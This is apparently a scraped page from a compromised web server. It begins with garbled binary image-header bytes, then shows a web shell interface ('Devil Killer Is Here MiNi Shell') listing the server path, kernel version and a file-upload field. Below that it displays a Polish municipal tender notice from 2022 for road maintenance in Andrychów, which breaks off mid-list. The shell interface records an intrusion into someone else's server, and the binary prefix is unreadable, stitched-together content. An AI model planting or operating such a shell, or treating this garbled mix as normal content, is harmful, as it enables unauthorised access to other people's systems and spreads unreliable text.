JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220511/0015407401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Bieżące utrzymanie dróg gminnych na terenie Gminy Andrychów w roku 2022 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ANDRYCHÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 072182031</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Andrychów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">338429952</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@andrychow.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.andrychow.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bieżące utrzymanie dróg gminnych na terenie Gminy Andrychów w roku 2022 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-25cb640d-d109-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00154074</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00034030/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Bieżące utrzymanie dróg gminnych na terenie Gminy Andrychów w roku 2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://josephine.proebiz.com/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu<br/>prowadzona jest zgodnie z postanowieniami Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).<br/>8.3 Z uwagi na brak przesłanek określonych w art. 65 ust 1, art. 66 i 69 ustawy Pzp Zamawiający nie przewiduje sposobu<br/>komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ, tj. za<br/>pośrednictwem systemu JOSEPHINE pod adresem https://josephine.proebiz.com/pl/ zwanego dalej Systemem/Platformą.<br/>8.4 Zamawiający nie ponosi odpowiedzialności za korzystanie z systemu, w tym złożenie oferty w sposób niezgodny z Instrukcją<br/>korzystania z Systemu.<br/>8.5 Zamawiający dopuszcza komunikację poprzez pocztę elektroniczną na adres zamowienia.publiczne@andrychow.eu z<br/>zastrzeżeniem, że ofertę należy złożyć wyłącznie za pośrednictwem Systemu. Przekazanie wszelkiej korespondencji poprzez pocztę<br/>elektroniczną wymaga na żądanie każdej ze stron, niezwłocznego potwierdzenia faktu ich otrzymania.<br/>8.6 Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową) - zobowiązany jest zapoznać się z<br/>instrukcjami użytkowników Platformy przetargowej - dostępnymi pod adresem https://josephine.proebiz.com/pl/ oraz zaakceptować<br/>regulamin korzystania z Platformy przetargowej.<br/>8.7 Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu, o którym mowa w pkt. 8.6 niniejszego rozdziału<br/>SWZ.<br/>8.8 Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie internetowej Platformy<br/>przetargowej - pod adresem: https://josephine.proebiz.com/pl/<br/>8.9 Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj. PROEBIZ s.r.o., Masarykovo<br/>náměstí 52/33, CZ - 702 00 Ostrava - Moravská Ostrava, C.9176, nr tel. +48 222 139 900, e-mail: houston@proebiz.com od<br/>poniedziałku do piątku (dni robocze) w godz. 8.00 – 16.00.<br/>8.10 Zamawiający informuje, iż formaty plików wykorzystywanych przez wykonawców powinny być zgodne z „OBWIESZCZENIEM<br/>PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w<br/>sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”.<br/>8.11 Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>8.12 W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip, lub .7Z.<br/>8.13 Wśród formatów powszechnych, a NIE występujących w rozporządzeniu występują m.in.: .gif .bmp .numbers .pages.<br/>Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>8.19 Zaleca się, aby komunikacja z wykonawcami odbywała się tylko w systemie Josephine.<br/>8.22 Zgodnie z art. 63 ust. 2 Pzp w postępowaniu o udzielenie zamówienia ofertę składa się, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Z uwagi na ograniczoną liczbę znaków szczegółowe wymagania techniczne i organizacyjne określone<br/>są w rozdziale 8 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">23.1.1 administratorem Pani/Pana danych osobowych jest: Gmina Andrychów reprezentowana przez Burmistrza Andrychowa Adres Zamawiającego: 34-120 Andrychów, Rynek 15 Tel. 33/ 842 99 00 Fax: 33/ 875 29 16 info@andrychow.eu http://www.andrychow.eu/ Dane kontaktowe inspektora ochrony danych osobowych w Gminie Andrychów: e-mail: iod@andrychow.eu, tel. 33 842 99 21;<br/> 23.1.2 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: Bieżące utrzymanie dróg gminnych na terenie Gminy Andrychów w roku 2022 Znak postępowania: BZP.271.8.2022, prowadzonym w trybie podstawowym;<br/> 23.1.3 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp.<br/> 23.1.4 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/> 23.1.5 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/> 23.1.6 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/> 23.1.7 posiada Pani/Pan:<br/> 23.1.7.1 na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/> 23.1.7.2 na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/> 23.1.7.3 na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/> 23.1.7.4 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> 23.1.8 nie przysługuje Pani/Panu:<br/> 23.1.8.1 w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> 23.1.8.2 prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> 23.1.8.3 na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/> 23.1.9 przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie zadania pn: Bieżące utrzymanie dróg gminnych na terenie Gminy Andrychów w roku 2022.<br/> 5.2 Zakres przedmiotu zamówienia obejmuje w szczególności:<br/> 5.2.1 Remont dróg o nawierzchni kamiennej, w tym: <br/> 5.2.1.1 naprawę nawierzchni tłuczniowej, <br/> 5.2.1.2 ścinanie poboczy,<br/> 5.2.1.3 uzupełnianie poboczy materiałem kamiennym lub korą asfaltową.<br/> 5.2.2 Pracę sprzętu, w tym:<br/> 5.2.2.1 koparko – ładowarki,<br/> 5.2.2.2 samochodu samowyładowczego 6-12 t,<br/> 5.2.2.3 walca drogowego wibracyjnego o masie min. 4 t.<br/> 5.2.3 Dostawę materiałów kamiennych, w tym:<br/> 5.2.3.1 tłucznia drogowego drobnego o frakcji 10-31 mm,<br/> 5.2.3.2 tłucznia drogowego grubego o frakcji 30-61 mm.<br/> 5.2.4 Konserwację rowów, przepustów i skarp, w tym:<br/> 5.2.4.1 odtworzenie oraz czyszczenie rowów z namułu wraz z profilowaniem skarp rowów,<br/> 5.2.4.2 umocnienie skarp płytami betonowymi ażurowymi 60x40x10,<br/> 5.2.4.3 umocnienie skarp płytami betonowymi ażurowymi 100x75x12,5.<br/> 5.2.5 Remont – wymiana przepustów rurowych wraz z robotami towarzyszącymi, w tym:<br/> 5.2.5.1 o średnicach 500-600 mm.<br/> 5.2.6 Wbudowanie korytek, w tym:<br/> 5.2.6.1 wbudowanie korytek skrzynkowych 30x40x50,<br/> 5.2.6.2 wbudowanie korytek najazdowych 30x50x 10,<br/> 5.2.6.3 wbudowanie korytek kolejowych 50x50x50.<br/> 5.2.7 Montaż krat najazdowych na korytka<br/> 5.2.8 Dostawa materiałów budowlanych, w tym:<br/> 5.2.8.1 korytka skrzynkowe 30x40x50,<br/> 5.2.8.2 korytka najazdowe 30x50x10,<br/> 5.2.8.3 korytka kolejowe 50x50x50,<br/> 5.2.8.4 płyty ażurowe zbrojone typu Jomb 100x75x12,5,<br/> 5.2.8.5 płyty ażurowe 60x40x10,<br/> 5.2.8.6 rury PCV Ø 300,<br/> 5.2.8.7 rury PCV Ø 400,<br/> 5.2.8.8 rury PCV Ø 500.<br/> 5.2.9 Inne prace i roboty niezbędne do prawidłowego wykonania przedmiotu umowy, w tym między innymi:<br/> 5.2.9.1 oznakowanie oraz zabezpieczenie terenu robót, <br/> 5.2.9.2 opracowanie projektu organizacji ruchu na czas prowadzenia robót (gdy wymagane),<br/> 5.2.9.3 organizację zaplecza,<br/> 5.2.9.4 organizację dojść i dojazdów do posesji w trakcie prowadzenia robót, <br/> 5.2.9.5 bieżący wywóz materiałów nieużytecznych,<br/> 5.2.9.6 wykonanie robót naprawczych infrastruktury technicznej, której stan techniczny na skutek realizacji robót uległ pogorszeniu, w tym robót odtworzeniowych.<br/> 5.3 Szczegółowy opis i zakres przedmiotu zamówienia określony został w załączonej Specyfikacji technicznej wykonania i odbioru robót.<br/> 5.4 Wykonawca jest zobowiązany zrealizować zamówienie na zasadach i warunkach opisanych w projekcie umowy.<br/> 5.5 Wykonawca zobowiązany jest realizować przedmiot zamówienia zgodnie z obowiązującymi normami i wiedzą techniczną, określonymi m.in. ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U.  2021 r. poz. 2351 z późn. zm.). przy zachowaniu należytej staranności, właściwej organizacji pracy oraz zasad BHP.<br/> 5.6 W przypadku wystąpienia w materiałach przetargowych jednoznacznych nazw patentów, znaków towarowych, materiałów, wyrobów lub urządzeń wskazujących na producenta i konkretnych typów katalogowych – wszystkie takie nazwy każdorazowo należy czytać z klauzulą „lub równoważne” o takich samych lub nie gorszych parametrach technicznych, jakościowych, funkcjonalnych oraz estetycznych. Jeżeli w w/w dokumentach podano konkretne typy materiałów, wyrobów i urządzeń, należy to traktować, jako pomocnicze wskazanie minimalnego poziomu jakościowego (standardu). Zamawiający dopuszcza oferowanie materiałów i urządzeń równoważnych, pod warunkiem, że zagwarantują one uzyskanie parametrów jakościowych i cech użytkowych, co najmniej na poziomie wskazanego produktu. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów uwiarygadniających te materiały lub urządzenia w celu udowodnienia, że oferowane parametry jakościowe i cechy użytkowe są równoważnie lub lepsze od złożonych w dokumentacji. Udowodnienie, że zastosowane materiały, przedmioty lub towary mają parametry równe lub lepsze niż materiały, przedmioty lub towary powołane w opisie przedmiotu zamówienia spoczywa na Wykonawcy. Nie dopuszcza się wprowadzania zmian w zakresie założeń dokumentacji projektowej, których skutki miałyby wpływ na przyjęte w projekcie warunki architektoniczne oraz parametry technologiczne. Koszty związane z wykazaniem równoważności rozwiązań ponosi Wykonawca. Wykonawca składający ofertę równoważną ponosi pełną odpowiedzialność za prawidłowe funkcjonowanie rozwiązań technicznych przewidzianych w dokumentacji projektowej.<br/> 5.7. Zamawiający nie dokonuje podziału zamówienia na części. Tym samym zamawiający nie dopuszcza składania ofert częściowych, o których mowa w art. 7 pkt 15 ustawy Pzp. Powody niedokonania podziału: podział zamówienia na części groziłby nadmiernymi trudnościami technicznymi. Ponadto dokonanie podziału zamówienia na części nie zwiększyłoby zaangażowania Wykonawców z sektora MŚP, jak również nie wpłynęłaby na zwiększenie konkurencyjności w postępowaniu.<br/> 5.8 Zamawiający na podstawie art. 95 ust. 1 ustawy Pzp wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U. z 2020 r. poz. 1320 ze zm.). tj.- prace fizyczne obejmujące: remont dróg o nawierzchni kamiennej, pracę sprzętu, konserwację rowów, przepustów i skarp, remont – wymianę przepustów rurowych wraz z robotami towarzyszącymi, wbudowanie korytek, montaż krat najazdowych na korytka, dostawę materiałów budowlanych.<br/><br/>Maksymalny termin wykonania jednostkowego zlecenia wynosi 20 dni roboczych od daty otrzymania zlecenia i jest jednym z kryteriów oceny ofert zgodnie z zapisem rozdziału 19 pkt. 19.3 niniejszego SWZ. Jeżeli Wykonawca w Formularzu Ofertowym nie poda terminu wykonania jednostkowego zlecenia lub zaoferuje termin wykonania jednostkowego zlecenia dłuższy niż 20 dni roboczych od daty otrzymania zlecenia - oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112100-6 - Roboty w zakresie kopania rowów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <p class="mb-0">45232400-6 - Roboty budowlane w zakresie kanałów ściekowych</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">44114200-4 - Produkty betonowe</p> <p class="mb-0">44163100-1 - Rury</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45500000-2 - Wynajem maszyn i urządzeń wraz z obsługą operatorską do prowadzenia robót z zakresu budownictwa oraz inżynierii wodnej i lądowej</p> <p class="mb-0">14212200-2 - Kruszywo</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">4.4 Zamawiający przewiduje możliwość udzielenia w okresie 3 lat od dnia udzielenia zamówienia podstawowego dotychczasowemu Wykonawcy robót, zamówienia polegającego na powtórzeniu podobnych robót budowlanych o całkowitej wartości wynoszącej 100% wartości zamówienia podstawowego. Zamówienia te obejmują:<br/> 4.4.1 Remont dróg o nawierzchni kamiennej, w tym: <br/> 4.4.1.1 naprawę nawierzchni tłuczniowej, <br/> 4.4.1.2 ścinanie poboczy,<br/> 4.4.1.3 uzupełnianie poboczy materiałem kamiennym lub korą asfaltową.<br/> 4.4.2 Pracę sprzętu, w tym:<br/> 4.4.2.1 koparko – ładowarki,<br/> 4.4.2.2 samochodu samowyładowczego 6-12 t,<br/> 4.4.2.3 walca drogowego wibracyjnego o masie min. 4 t.<br/> 4.4.3 Dostawę materiałów kamiennych, w tym:<br/> 4.4.3.1 tłucznia drogowego drobnego o frakcji 10-31 mm,<br/> 4.4.3.2 tłucznia drogowego grubego o frakcji 30-61 mm.<br/> 4.4.4 Konserwację rowów, przepustów i skarp, w tym:<br/> 4.4.4.1 odtworzenie oraz czyszczenie rowów z namułu wraz z profilowaniem skarp rowów,<br/> 4.4.4.2 umocnienie skarp płytami betonowymi ażurowymi 60x40x10,<br/> 4.4.4.3 umocnienie skarp płytami betonowymi ażurowymi 100x75x12,5.<br/> 4.4.5 Remont – wymiana przepustów rurowych wraz z robotami towarzyszącymi, w tym:<br/> 4.4.5.1 o średnicach 500-600 mm.<br/> 4.4.6 Wbudowanie korytek, w tym:<br/> 4.4.6.1 wbudowanie korytek skrzynkowych 30x40x50,<br/> 4.4.6.2 wbudowanie korytek najazdowych 30x50x 10,<br/> 4.4.6.3 wbudowanie korytek kolejowych 50x50x50.<br/> 4.4.7 Montaż krat najazdowych na korytka<br/> 4.4.8 Dostawa materiałów budowlanych, w tym:<br/> 4.4.8.1 korytka skrzynkowe 30x40x50,<br/> 4.4.8.2 korytka najazdowe 30x50x10,<br/> 4.4.8.3 korytka kolejowe 50x50x50,<br/> 4.4.8.4 płyty ażurowe zbrojone typu Jomb 100x75x12,5,<br/> 4.4.8.5 płyty ażurowe 60x40x10,<br/> 4.4.8.6 rury PCV Ø 300,<br/> 4.4.8.7 rury PCV Ø 400,<br/> 4.4.8.8 rury PCV 